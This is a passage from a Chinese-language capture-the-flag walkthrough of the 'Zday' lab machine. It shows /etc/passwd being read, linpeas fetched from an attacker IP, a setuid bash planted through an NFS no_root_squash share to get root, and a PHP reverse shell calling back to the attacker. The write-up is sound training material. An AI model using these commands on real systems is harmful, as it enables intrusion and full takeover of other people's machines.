\/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\nestas:x:1000:1000:estas,,,:\/home\/estas:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nmysql:x:106:113:MySQL Server,,,:\/nonexistent:\/bin\/false\n_rpc:x:107:65534::\/run\/rpcbind:\/usr\/sbin\/nologin\nstatd:x:108:65534::\/var\/lib\/nfs:\/usr\/sbin\/nologin\ntftp:x:109:114:tftp daemon,,,:\/srv\/tftp:\/usr\/sbin\/nologin\nftp:x:110:115:ftp daemon,,,:\/srv\/ftp:\/usr\/sbin\/nologin\nfogproject:x:1001:1001::\/home\/fogproject:\/bin\/bash\n$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\nestas\nsshd\nfogproject\n$ ls -la \/home\/\ntotal 16\ndrwxr-xr-x  4 root       root       4096 Mar 10  2021 .\ndrwxr-xr-x 21 root       root       4096 Mar 10  2021 ..\ndrwxr-xr-x  3 estas      estas      4096 Mar 10  2021 estas\ndrwxr-xr-x  4 fogproject fogproject 4096 Jun 14 01:29 fogproject<\/code><\/pre>\n<p>\u4e0a\u4f20<code>linpeas.sh<\/code>\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<\/p>\n<pre><code class=\"language-bash\">$ cd \/tmp\n$ wget http:\/\/192.168.10.102:8888\/linpeas.sh\n$ chmod +x linpeas.sh\n$ .\/linpeas.sh<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355714.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355714.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614134424031\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u8fd9\u4e2a\u548c\u4e0b\u9762\u4e00\u5806\u670d\u52a1\u90fd\u662f<code>root<\/code>\u8fd0\u884c\u7684\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355715.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355715.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614134652856\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355716.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355716.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614134752220\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h3>\u65b9\u6cd5\u4e00\uff1aNFS\u6302\u8f7d\u6743\u9650\u8fc7\u9ad8<\/h3>\n<p>\u770b\u4e00\u4e0b\u4e0a\u9762\u90a3\u4e2a\u7740\u91cd\u6807\u7684<code>NFS<\/code>\uff1a<a href=\"https:\/\/book.hacktricks.wiki\/en\/linux-hardening\/privilege-escalation\/nfs-no_root_squash-misconfiguration-pe.html#squashing-basic-info\">https:\/\/book.hacktricks.wiki\/en\/linux-hardening\/privilege-escalation\/nfs-no_root_squash-misconfiguration-pe.html#squashing-basic-info<\/a><\/p>\n<blockquote>\n<p>NFS will usually (specially in linux) trust the indicated <code>uid<\/code> and <code>gid<\/code> by the client conencting to access the files (if kerberos is not used). However, there are some configurations that can be set in the server to <strong>change this behavior<\/strong>:<\/p>\n<ul>\n<li><strong><code>all_squash<\/code><\/strong>: It squashes all accesses mapping every user and group to <strong><code>nobody<\/code><\/strong> (65534 unsigned \/ -2 signed). Therefore, everyone is <code>nobody<\/code> and no users are used.<\/li>\n<li><strong><code>root_squash<\/code>\/<code>no_all_squash<\/code><\/strong>: This is default on Linux and <strong>only squashes access with uid 0 (root)<\/strong>. Therefore, any <code>UID<\/code> and <code>GID<\/code> are trusted but <code>0<\/code> is squashed to <code>nobody<\/code> (so no root imperonation is possible).<\/li>\n<li><strong>`<code>no_root_squash<\/code><\/strong>: This configuration if enabled doesn't even squash the root user. This means that if you mount a directory with this configuration you can access it as root.<\/li>\n<\/ul>\n<p>In the <strong>\/etc\/exports<\/strong> file, if you find some directory that is configured as <strong>no_root_squash<\/strong>, then you can <strong>access<\/strong> it from <strong>as a client<\/strong> and <strong>write inside<\/strong> that directory <strong>as<\/strong> if you were the local <strong>root<\/strong> of the machine.<\/p>\n<\/blockquote>\n<p>\u610f\u5473\u7740\u6302\u8f7d\u7a0b\u5e8f\u53ef\u4ee5\u4ee5root\u8fd0\u884c\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ mkdir temp\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ showmount -e $IP \nExport list for 192.168.10.101:\n\/images\/dev *\n\/images     *\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ sudo mount -t nfs $IP:\/images\/dev temp\/\n[sudo] password for kali: \nCreated symlink &#039;\/run\/systemd\/system\/remote-fs.target.wants\/rpc-statd.service&#039; \u2192 &#039;\/usr\/lib\/systemd\/system\/rpc-statd.service&#039;.\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ cd temp\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp]\n\u2514\u2500$ ls -la  \ntotal 12\ndrwxrwxrwx 3 1001 root 4096 Mar 10  2021 .\ndrwxrwxr-x 3 kali kali 4096 Jun 14 02:07 ..\n-rwxrwxrwx 1 1001 root    0 Mar 10  2021 .mntcheck\ndrwxrwxrwx 2 1001 root 4096 Mar 10  2021 postinitscripts\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp]\n\u2514\u2500$ cd postinitscripts\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp\/postinitscripts]\n\u2514\u2500$ ls -la\ntotal 12\ndrwxrwxrwx 2 1001 root 4096 Mar 10  2021 .\ndrwxrwxrwx 3 1001 root 4096 Mar 10  2021 ..\n-rwxrwxrwx 1 1001 root  249 Mar 10  2021 fog.postinit\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp\/postinitscripts]\n\u2514\u2500$ cat fog.postinit                                           \n#!\/bin\/bash\n## This file serves as a starting point to call your custom pre-imaging\/post init loading scripts.\n## &lt;SCRIPTNAME&gt; should be changed to the script you&#039;re planning to use.\n## Syntax of post init scripts are\n#. ${postinitpath}&lt;SCRIPTNAME&gt;<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b\u539f\u6765\u673a\u5b50\u7684<code>bash<\/code>\u7248\u672c\uff1a<\/p>\n<pre><code class=\"language-bash\">$ bash --version\nGNU bash, version 5.0.3(1)-release (x86_64-pc-linux-gnu)\nCopyright (C) 2019 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later &lt;http:\/\/gnu.org\/licenses\/gpl.html&gt;\n\nThis is free software; you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.<\/code><\/pre>\n<p>\u4e0b\u8f7d\u6307\u5b9a\u7248\u672c<code>bash<\/code>\u538b\u7f29\u5305\u5230\u672c\u5730\u8fdb\u884c\u7f16\u8bd1\uff1a<a href=\"https:\/\/ftp.gnu.org\/gnu\/bash\/\uff0c\u4f46\u662f\u6211\u8fd9\u8fb9\u62a5\u9519\u4e86\uff0c\u6240\u4ee5\u76f4\u63a5\u51c6\u5907\u4ece\u4e0b\u4e2a\u9776\u573a\">https:\/\/ftp.gnu.org\/gnu\/bash\/\uff0c\u4f46\u662f\u6211\u8fd9\u8fb9\u62a5\u9519\u4e86\uff0c\u6240\u4ee5\u76f4\u63a5\u51c6\u5907\u4ece\u4e0b\u4e2a\u9776\u573a<\/a> copy \u4e8c\u8fdb\u5236\u6587\u4ef6\u4e86\u3002\u3002\u3002\u7ed3\u679c\u8fd9\u4e2a\u9776\u673a\u95ee\u9898\u7ed9\u6211\u6574\u5d29\u6e83\u4e86\uff0c\u8fd8\u662f\u7528\u65b9\u6cd5\u4e8c\u5f97\u5230\u7684<code>root<\/code>\uff0c<code>copy<\/code>\u4e00\u4e0b\u8fd9\u4e2a\u9776\u673a\u7684 bash\uff0c\u518d\u8fdb\u884c\u64cd\u4f5c\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ mkdir temp\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ showmount -e $IP\nExport list for 192.168.10.102:\n\/images\/dev *\n\/images     *\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ sudo mount -t nfs $IP:\/images\/dev temp\/\nCreated symlink &#039;\/run\/systemd\/system\/remote-fs.target.wants\/rpc-statd.service&#039; \u2192 &#039;\/usr\/lib\/systemd\/system\/rpc-statd.service&#039;.\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ cp bash temp\/    \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday]\n\u2514\u2500$ cd temp      \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp]\n\u2514\u2500$ ls -la\ntotal 1156\ndrwxrwxrwx 3 1001 root    4096 Jun 14 11:47 .\ndrwxrwxr-x 3 kali kali    4096 Jun 14 11:46 ..\n-rw-rw-r-- 1 kali kali 1168776 Jun 14 11:47 bash\n-rwxrwxrwx 1 1001 root       0 Mar 10  2021 .mntcheck\ndrwxrwxrwx 2 1001 root    4096 Mar 10  2021 postinitscripts\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp]\n\u2514\u2500$ ls -la \/bin\/bash\n-rwxr-xr-x 1 root root 1298416 May 19 14:11 \/bin\/bash\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp]\n\u2514\u2500$ sudo chmod 4755 bash\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp]\n\u2514\u2500$ ls -la bash     \n-rwsr-xr-x 1 kali kali 1168776 Jun 14 11:47 bash\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp]\n\u2514\u2500$ sudo chown root:root bash\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp]\n\u2514\u2500$ ls -la bash\n-rwxr-xr-x 1 root root 1168776 Jun 14 11:47 bash\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp]\n\u2514\u2500$ sudo chmod 4755 bash              \n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Zday\/temp]\n\u2514\u2500$ ls -la bash\n-rwsr-xr-x 1 root root 1168776 Jun 14 11:47 bash<\/code><\/pre>\n<p>\u7136\u540e\u8fdb\u884c\u63d0\u6743\uff1a<\/p>\n<pre><code class=\"language-bash\">$ ls -la\ntotal 32\ndrwxr-xr-x 5 fogproject fogproject 4096 Jun 14 02:46 .\ndrwxr-xr-x 4 root       root       4096 Mar 10  2021 ..\n-rw-r--r-- 1 fogproject fogproject  220 Apr 18  2019 .bash_logout\n-rw-r--r-- 1 fogproject fogproject 3899 Mar 10  2021 .bashrc\ndrwxr-xr-x 3 fogproject fogproject 4096 Mar 10  2021 .config\ndrwx------ 3 fogproject fogproject 4096 Jun 14 01:43 .gnupg\ndrwxr-xr-x 3 fogproject fogproject 4096 Jun 14 02:46 .local\n-rw-r--r-- 1 fogproject fogproject  807 Apr 18  2019 .profile\n$ cd \/\n$ ls -la\ntotal 80\ndrwxr-xr-x  21 root       root  4096 Mar 10  2021 .\ndrwxr-xr-x  21 root       root  4096 Mar 10  2021 ..\nlrwxrwxrwx   1 root       root     7 Mar 10  2021 bin -&gt; usr\/bin\ndrwxr-xr-x   3 root       root  4096 Mar 10  2021 boot\ndrwxr-xr-x  17 root       root  3100 Jun 14 11:34 dev\ndrwxr-xr-x  80 root       root  4096 Jun 14 11:34 etc\ndrwxr-xr-x   4 root       root  4096 Mar 10  2021 home\ndrwxrwxrwx   4 fogproject root  4096 Mar 10  2021 images\nlrwxrwxrwx   1 root       root    31 Mar 10  2021 initrd.img -&gt; boot\/initrd.img-4.19.0-14-amd64\nlrwxrwxrwx   1 root       root    30 Mar 10  2021 initrd.img.old -&gt; boot\/initrd.img-4.19.0-9-amd64\nlrwxrwxrwx   1 root       root     7 Mar 10  2021 lib -&gt; usr\/lib\nlrwxrwxrwx   1 root       root     9 Mar 10  2021 lib32 -&gt; usr\/lib32\nlrwxrwxrwx   1 root       root     9 Mar 10  2021 lib64 -&gt; usr\/lib64\nlrwxrwxrwx   1 root       root    10 Mar 10  2021 libx32 -&gt; usr\/libx32\ndrwx------   2 root       root 16384 Mar 10  2021 lost+found\ndrwxr-xr-x   3 root       root  4096 Mar 10  2021 media\ndrwxr-xr-x   2 root       root  4096 Mar 10  2021 mnt\ndrwxr-xr-x   2 root       root  4096 Mar 10  2021 opt\ndr-xr-xr-x 158 root       root     0 Jun 14 11:34 proc\ndrwx------   4 root       root  4096 Jun 14 03:14 root\ndrwxr-xr-x  23 root       root   700 Jun 14 11:50 run\nlrwxrwxrwx   1 root       root     8 Mar 10  2021 sbin -&gt; usr\/sbin\ndrwxr-xr-x   4 root       root  4096 Mar 10  2021 srv\ndr-xr-xr-x  13 root       root     0 Jun 14 11:34 sys\ndrwxr-xr-x   5 fogproject root  4096 Mar 10  2021 tftpboot\ndrwxr-xr-x   2 root       root  4096 Mar 10  2021 tftpboot.prev\ndrwxrwxrwt   9 root       root  4096 Jun 14 11:42 tmp\ndrwxr-xr-x  13 root       root  4096 Mar 10  2021 usr\ndrwxr-xr-x  12 root       root  4096 Mar 10  2021 var\nlrwxrwxrwx   1 root       root    28 Mar 10  2021 vmlinuz -&gt; boot\/vmlinuz-4.19.0-14-amd64\nlrwxrwxrwx   1 root       root    27 Mar 10  2021 vmlinuz.old -&gt; boot\/vmlinuz-4.19.0-9-amd64\n$ cd images\/dev\n$ ls -la\ntotal 1156\ndrwxrwxrwx 3 fogproject root    4096 Jun 14 11:47 .\ndrwxrwxrwx 4 fogproject root    4096 Mar 10  2021 ..\n-rwsr-xr-x 1 root       root 1168776 Jun 14 11:47 bash\n-rwxrwxrwx 1 fogproject root       0 Mar 10  2021 .mntcheck\ndrwxrwxrwx 2 fogproject root    4096 Mar 10  2021 postinitscripts\n$ .\/bash -p\nbash-5.0# whoami;id\nroot\nuid=1001(fogproject) gid=1001(fogproject) euid=0(root) groups=1001(fogproject)\nbash-5.0# cd \/root\nbash-5.0# cat root.txt\nihavebeenherealways<\/code><\/pre>\n<p>\u4e00\u6837\u53ef\u4ee5\u62ff\u5230root\uff01\uff01\uff01\uff01<\/p>\n<h3>\u65b9\u6cd5\u4e8c\uff1a\u8f6c\u5230www-data\u6743\u9650<\/h3>\n<pre><code class=\"language-bash\">$ ls -la \/etc\/nginx\/sites-enabled\/*;\nlrwxrwxrwx 1 root root 34 Mar 10  2021 \/etc\/nginx\/sites-enabled\/default -&gt; \/etc\/nginx\/sites-available\/default\n$ cat \/etc\/nginx\/sites-enabled\/default\n##\n# You should look at the following URL&#039;s in order to grasp a solid understanding\n# of Nginx configuration files in order to fully unleash the power of Nginx.\n# https:\/\/www.nginx.com\/resources\/wiki\/start\/\n# https:\/\/www.nginx.com\/resources\/wiki\/start\/topics\/tutorials\/config_pitfalls\/\n# https:\/\/wiki.debian.org\/Nginx\/DirectoryStructure\n#\n# In most cases, administrators will remove this file from sites-enabled\/ and\n# leave it as reference inside of sites-available where it will continue to be\n# updated by the nginx packaging team.\n#\n# This file will automatically load configuration files provided by other\n# applications, such as Drupal or WordPress. These applications will be made\n# available underneath a path with that package name, such as \/drupal8.\n#\n# Please see \/usr\/share\/doc\/nginx-doc\/examples\/ for more detailed examples.\n##\n\n# Default server configuration\n#\nserver {\n        listen 80 default_server;\n        listen [::]:80 default_server;\n\n        # SSL configuration\n        #\n        # listen 443 ssl default_server;\n        # listen [::]:443 ssl default_server;\n        #\n        # Note: You should disable gzip for SSL traffic.\n        # See: https:\/\/bugs.debian.org\/773332\n        #\n        # Read up on ssl_ciphers to ensure a secure configuration.\n        # See: https:\/\/bugs.debian.org\/765782\n        #\n        # Self signed certs generated by the ssl-cert package\n        # Don&#039;t use them in a production server!\n        #\n        # include snippets\/snakeoil.conf;\n\n        root \/var\/www\/html;\n\n        # Add index.php to the list if you are using PHP\n        index index.html index.htm index.nginx-debian.html;\n\n        server_name _;\n\n        location \/ {\n                # First attempt to serve request as file, then\n                # as directory, then fall back to displaying a 404.\n                try_files $uri $uri\/ =404;\n        }\n\n        # pass PHP scripts to FastCGI server\n        #\n        #location ~ \\.php$ {\n        #       include snippets\/fastcgi-php.conf;\n        #\n        #       # With php-fpm (or other unix sockets):\n        #       fastcgi_pass unix:\/run\/php\/php7.3-fpm.sock;\n        #       # With php-cgi (or other tcp sockets):\n        #       fastcgi_pass 127.0.0.1:9000;\n        #}\n\n        # deny access to .htaccess files, if Apache&#039;s document root\n        # concurs with nginx&#039;s one\n        #\n        #location ~ \/\\.ht {\n        #       deny all;\n        #}\n}\n\n# Virtual Host configuration for example.com\n#\n# You can move that to a different file under sites-available\/ and symlink that\n# to sites-enabled\/ to enable it.\n#\n#server {\n#       listen 80;\n#       listen [::]:80;\n#\n#       server_name example.com;\n#\n#       root \/var\/www\/example.com;\n#       index index.html;\n#\n#       location \/ {\n#               try_files $uri $uri\/ =404;\n#       }\n#}\n$ ls -la \/etc\/nginx\/sites-enabled\/default\nlrwxrwxrwx 1 root root 34 Mar 10  2021 \/etc\/nginx\/sites-enabled\/default -&gt; \/etc\/nginx\/sites-available\/default\n$ ls -la \/etc\/nginx\/sites-available\/default\n-rw-r--r-- 1 root root 2412 Aug 24  2020 \/etc\/nginx\/sites-available\/default<\/code><\/pre>\n<p>\u9057\u61be\u7684\u662f\u54b1\u4eec\u6ca1\u6709\u6267\u884c\u6743\u9650\u3002\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">$ find \/ -type d -writable 2&gt;\/dev\/null          \n\/images\n\/images\/postdownloadscripts\n\/images\/dev\n\/images\/dev\/postinitscripts\n\/run\/user\/1001\n\/run\/user\/1001\/gnupg\n\/run\/user\/1001\/systemd\n\/run\/lock\n\/home\/fogproject\n\/home\/fogproject\/.gnupg\n\/home\/fogproject\/.gnupg\/private-keys-v1.d\n\/home\/fogproject\/.local\n\/home\/fogproject\/.local\/share\n\/home\/fogproject\/.local\/share\/nano\n\/home\/fogproject\/.config\n\/home\/fogproject\/.config\/autostart\n\/tftpboot\n\/tftpboot\/arm64-efi\n\/tftpboot\/i386-efi\n\/tftpboot\/10secdelay\n\/tftpboot\/10secdelay\/arm64-efi\n\/tftpboot\/10secdelay\/i386-efi\n\/tmp\n\/tmp\/.Test-unix\n\/tmp\/.font-unix\n\/tmp\/.X11-unix\n\/tmp\/.XIM-unix\n\/tmp\/.ICE-unix\n\/proc\/32684\/task\/32684\/fd\n\/proc\/32684\/fd\n\/proc\/32684\/map_files\n\/var\/www\/html\/fog\/service\/ipxe\n\/var\/tmp\n\/var\/lib\/php\/sessions\n\/dev\/mqueue\n\/dev\/shm\n\/sys\/fs\/cgroup\/systemd\/user.slice\/user-1001.slice\/user@1001.service\n\/sys\/fs\/cgroup\/systemd\/user.slice\/user-1001.slice\/user@1001.service\/init.scope\n\/sys\/fs\/cgroup\/systemd\/user.slice\/user-1001.slice\/user@1001.service\/gpg-agent.service\n\/sys\/fs\/cgroup\/unified\/user.slice\/user-1001.slice\/user@1001.service\n\/sys\/fs\/cgroup\/unified\/user.slice\/user-1001.slice\/user@1001.service\/init.scope\n\/sys\/fs\/cgroup\/unified\/user.slice\/user-1001.slice\/user@1001.service\/gpg-agent.service<\/code><\/pre>\n<p>\u53d1\u73b0\u6709\u4e00\u5904\u5730\u65b9\u54b1\u4eec\u5177\u6709\u53ef\u5199\u6743\u9650\uff1a<\/p>\n<pre><code class=\"language-bash\">\/var\/www\/html\/fog\/service\/ipxe<\/code><\/pre>\n<p>\u5c1d\u8bd5\u5728\u91cc\u9762\u4e0a\u4f20\u4e00\u4e2a\u53cd\u5f39shell\uff01<\/p>\n<pre><code class=\"language-bash\">$ nano revshell.php\n$ head revshell.php\n\n  &lt;?php\n  \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n  \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n  set_time_limit (0);\n  $VERSION = &quot;1.0&quot;;\n  $ip = &#039;192.168.10.102&#039;;  \/\/ You have changed this\n  $port = 1234;  \/\/ And this\n  $chunk_size = 1400;<\/code><\/pre>\n<p>\u770b\u770b\u80fd\u4e0d\u80fd\u6fc0\u6d3b\uff0c\u603b\u611f\u89c9\u4e0d\u884c\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.10.101\/fog\/service\/ipxe\/revshell.php<\/code><\/pre>\n<p>\u4f46\u4e8b\u5b9e\u662f\u53ef\u4ee5\u6267\u884c\u3002\u3002\u3002\u3002\u53ef\u80fd\u662ffog\u7684\u67d0\u4e2a\u914d\u7f6e\u3002\u3002\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355717.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355717.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614150659473\" style=\"zoom:33%;\" \/><\/div><\/p>\n<h4>\u5207\u6362dash<\/h4>\n<pre><code class=\"language-bash\">(remote) www-data@zday:\/$ cd ~   \n(remote) www-data@zday:\/var\/www$ ls -la\ntotal 12\ndrwxr-xr-x  3 root root 4096 Mar 10  2021 .\ndrwxr-xr-x 12 root root 4096 Mar 10  2021 ..\nlrwxrwxrwx  1 root root   18 Mar 10  2021 fog -&gt; \/var\/www\/html\/fog\/\ndrwxr-xr-x  3 root root 4096 Mar 10  2021 html\n(remote) www-data@zday:\/var\/www$ sudo -l\nMatching Defaults entries for www-data on zday:\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\n\nUser www-data may run the following commands on zday:\n    (estas) NOPASSWD: \/usr\/bin\/dash\n(remote) www-data@zday:\/var\/www$ sudo -u estas \/usr\/bin\/dash<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355718.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506142355718.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250614150903058\" \/><\/div><\/p>\n<p>\u53ef\u80fd\u662f\u88ab<code>pwncat-cs<\/code>\u81ea\u52a8\u5904\u7406\u4e86\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">(remote) estas@zday:\/var\/www$ cd ~\n(remote) estas@zday:\/home\/estas$ ls -la\ntotal 36\ndrwxr-xr-x 3 estas estas 4096 Mar 10  2021 .\ndrwxr-xr-x 4 root  root  4096 Mar 10  2021 ..\n-rw------- 1 estas estas  100 Mar 10  2021 .Xauthority\n-rw-r--r-- 1 estas estas  220 Mar 10  2021 .bash_logout\n-rw-r--r-- 1 estas estas 3526 Mar 10  2021 .bashrc\ndrwxr-xr-x 3 estas estas 4096 Mar 10  2021 .local\n-rw-r--r-- 1 estas estas  807 Mar 10  2021 .profile\n-rwx--x--x 1 estas estas 1920 Mar 10  2021 flag.sh\n-rw------- 1 estas estas   15 Mar 10  2021 user.txt\n(remote) estas@zday:\/home\/estas$ .\/flag.sh\n\\033[0;35m\n                                   .     **                                     \n                                *           *.                                  \n                                              ,*                                \n                                                 *,                             \n                         ,                         ,*                           \n                      .,                              *,                        \n                    \/                                    *                      \n                 ,*                                        *,                   \n            